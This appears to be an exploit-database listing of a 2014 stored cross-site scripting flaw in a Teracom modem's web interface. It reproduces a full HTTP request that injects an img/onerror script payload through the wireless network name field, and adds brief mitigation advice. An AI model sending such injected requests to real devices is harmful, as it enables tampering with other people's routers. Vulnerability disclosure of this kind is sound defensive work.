header-logo
Suggest Exploit
vendor:
T2-B-Gawv1.4U10Y-BI
by:
Rakesh S
7,5
CVSS
HIGH
Stored XSS
79
CWE
Product Name: T2-B-Gawv1.4U10Y-BI
Affected Version From: T2-B-Gawv1.4U10Y-BI
Affected Version To: T2-B-Gawv1.4U10Y-BI
Patch Exists: N/A
Related CWE: N/A
CPE: h:teracom:t2-b-gawv1.4u10y-bi
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2014

Teracom Modem Stored XSS Vulnerability

The variable Network Name (SSID): has been set to '><img src=x onerror=prompt(1);>%3E' which is a stored XSS vulnerability.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Teracom Modem Stored XSS Vulnerability
# Date: 19-01-2014
# Author: Rakesh S
# Software Link: http://www.teracom.in/
# Version:  T2-B-Gawv1.4U10Y-BI
# Tested on: Windows 7
# Code :
GET /webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=5&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=4&essid="><img src=x onerror=prompt(1);>%3E&hidessid=off&security=wpawpa2&authmethodselect=psk&wpapp=---&pmkcaching=off&confirm=Confirm HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/webconfig/wlan/country.html
Cookie: httpTimeOut=None
Authorization: Basic VGhpc2lzbm90Ok15b3JnaW5hbHBhc3N3b3Jk

Attack details
The variable Network Name (SSID): has been set to "><img src=x onerror=prompt(1);>